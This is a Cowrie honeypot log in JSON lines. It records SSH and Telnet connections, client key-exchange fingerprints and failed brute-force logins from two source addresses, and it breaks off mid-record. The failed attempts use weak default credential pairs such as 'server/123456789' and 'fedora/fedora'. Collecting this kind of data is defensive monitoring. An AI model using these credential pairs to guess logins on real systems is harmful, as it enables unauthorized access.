{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:08:16.440908Z","src_ip":"212.227.125.160","session":"948a4c237a06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42578,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd4077e7c201","protocol":"ssh","message":"New connection: 212.227.235.229:42578 (1.2.3.4:22) [session: fd4077e7c201]","sensor":"my-vps","timestamp":"2025-08-31T05:08:23.943546Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48354,"dst_ip":"1.2.3.4","dst_port":22,"session":"888d9118a075","protocol":"ssh","message":"New connection: 212.227.235.229:48354 (1.2.3.4:22) [session: 888d9118a075]","sensor":"my-vps","timestamp":"2025-08-31T05:08:30.177226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:08:30.186191Z","src_ip":"212.227.235.229","session":"888d9118a075"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:08:30.439373Z","src_ip":"212.227.235.229","session":"888d9118a075"}
{"eventid":"cowrie.login.failed","username":"aryan","password":"aryan@123","message":"login attempt [aryan/aryan@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:31.464917Z","src_ip":"212.227.235.229","session":"888d9118a075"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:32.731186Z","src_ip":"212.227.235.229","session":"888d9118a075"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38624,"dst_ip":"1.2.3.4","dst_port":22,"session":"a04932f570a8","protocol":"ssh","message":"New connection: 212.227.235.229:38624 (1.2.3.4:22) [session: a04932f570a8]","sensor":"my-vps","timestamp":"2025-08-31T05:08:35.662737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:08:36.461603Z","src_ip":"212.227.235.229","session":"a04932f570a8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:08:36.462320Z","src_ip":"212.227.235.229","session":"a04932f570a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47900,"dst_ip":"1.2.3.4","dst_port":22,"session":"db625052a59f","protocol":"ssh","message":"New connection: 212.227.235.229:47900 (1.2.3.4:22) [session: db625052a59f]","sensor":"my-vps","timestamp":"2025-08-31T05:08:39.729095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:08:39.729789Z","src_ip":"212.227.235.229","session":"db625052a59f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:08:39.981171Z","src_ip":"212.227.235.229","session":"db625052a59f"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1","message":"login attempt [test1/test1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:41.047898Z","src_ip":"212.227.235.229","session":"db625052a59f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:08:41.363537Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:08:41.364702Z","src_ip":"212.227.235.229","session":"fd4077e7c201"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:42.301843Z","src_ip":"212.227.235.229","session":"db625052a59f"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456789","message":"login attempt [server/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:42.659551Z","src_ip":"212.227.235.229","session":"a04932f570a8"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:08:44.488581Z","src_ip":"212.227.235.229","session":"a04932f570a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48043,"dst_ip":"1.2.3.4","dst_port":23,"session":"a636c1e85344","protocol":"telnet","message":"New connection: 212.227.125.160:48043 (1.2.3.4:23) [session: a636c1e85344]","sensor":"my-vps","timestamp":"2025-08-31T05:08:47.336374Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47638,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2a1c0abf1c","protocol":"ssh","message":"New connection: 212.227.125.160:47638 (1.2.3.4:22) [session: 2e2a1c0abf1c]","sensor":"my-vps","timestamp":"2025-08-31T05:08:48.145552Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56738,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc75fe5b07cf","protocol":"ssh","message":"New connection: 212.227.125.160:56738 (1.2.3.4:22) [session: bc75fe5b07cf]","sensor":"my-vps","timestamp":"2025-08-31T05:08:57.107571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:08:57.604178Z","src_ip":"212.227.125.160","session":"bc75fe5b07cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:08:57.605085Z","src_ip":"212.227.125.160","session":"bc75fe5b07cf"}
{"eventid":"cowrie.login.failed","username":"server","password":"123456789","message":"login attempt [server/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:08:59.651840Z","src_ip":"212.227.125.160","session":"bc75fe5b07cf"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:01.237387Z","src_ip":"212.227.125.160","session":"bc75fe5b07cf"}
{"eventid":"cowrie.session.closed","duration":14.756793975830078,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:02.093098Z","src_ip":"212.227.125.160","session":"a636c1e85344"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45452,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bcd30696036","protocol":"ssh","message":"New connection: 212.227.235.229:45452 (1.2.3.4:22) [session: 9bcd30696036]","sensor":"my-vps","timestamp":"2025-08-31T05:09:08.326882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:08.327802Z","src_ip":"212.227.235.229","session":"9bcd30696036"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:09:08.599591Z","src_ip":"212.227.235.229","session":"9bcd30696036"}
{"eventid":"cowrie.login.failed","username":"1","password":"123456","message":"login attempt [1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:09.730513Z","src_ip":"212.227.235.229","session":"9bcd30696036"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50546,"dst_ip":"1.2.3.4","dst_port":22,"session":"5db5238f7308","protocol":"ssh","message":"New connection: 212.227.235.229:50546 (1.2.3.4:22) [session: 5db5238f7308]","sensor":"my-vps","timestamp":"2025-08-31T05:09:10.255849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:10.256817Z","src_ip":"212.227.235.229","session":"5db5238f7308"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:09:10.515001Z","src_ip":"212.227.235.229","session":"5db5238f7308"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:11.004938Z","src_ip":"212.227.235.229","session":"9bcd30696036"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"fedora","message":"login attempt [fedora/fedora] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:11.597369Z","src_ip":"212.227.235.229","session":"5db5238f7308"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:12.861562Z","src_ip":"212.227.235.229","session":"5db5238f7308"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45122,"dst_ip":"1.2.3.4","dst_port":22,"session":"4172529c5485","protocol":"ssh","message":"New connection: 212.227.235.229:45122 (1.2.3.4:22) [session: 4172529c5485]","sensor":"my-vps","timestamp":"2025-08-31T05:09:20.580447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:20.583241Z","src_ip":"212.227.235.229","session":"4172529c5485"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:09:20.663460Z","src_ip":"212.227.235.229","session":"4172529c5485"}
{"eventid":"cowrie.login.failed","username":"update","password":"update123","message":"login attempt [update/update123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:09:20.985777Z","src_ip":"212.227.235.229","session":"4172529c5485"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:22.070098Z","src_ip":"212.227.235.229","session":"4172529c5485"}
{"eventid":"cowrie.session.closed","duration":"38.8","message":"Connection lost after 38.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:09:26.983286Z","src_ip":"212.227.125.160","session":"2e2a1c0abf1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45816,"dst_ip":"1.2.3.4","dst_port":22,"session":"f231c5c5daa8","protocol":"ssh","message":"New connection: 212.227.235.229:45816 (1.2.3.4:22) [session: f231c5c5daa8]","sensor":"my-vps","timestamp":"2025-08-31T05:09:34.877988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:09:35.522026Z","src_ip":"212.227.235.229","session":"f231c5c5daa8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:09:35.522989Z","src_ip":"212.227.235.229","session":"f231c5c5daa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49934,"dst_ip":"1.2.3.4","dst_port":22,"session":"87fe467106d1","protocol":"ssh","message":"New connection: 212.227.235.229:49934 (1.2.3.4:22) [session: 87fe467106d1]","sensor":"my-vps","timestamp":"2025-08-31T05:09:39.882375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:09:39.883226Z","src_ip":"212.227.235.229","session":"87fe467106d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.c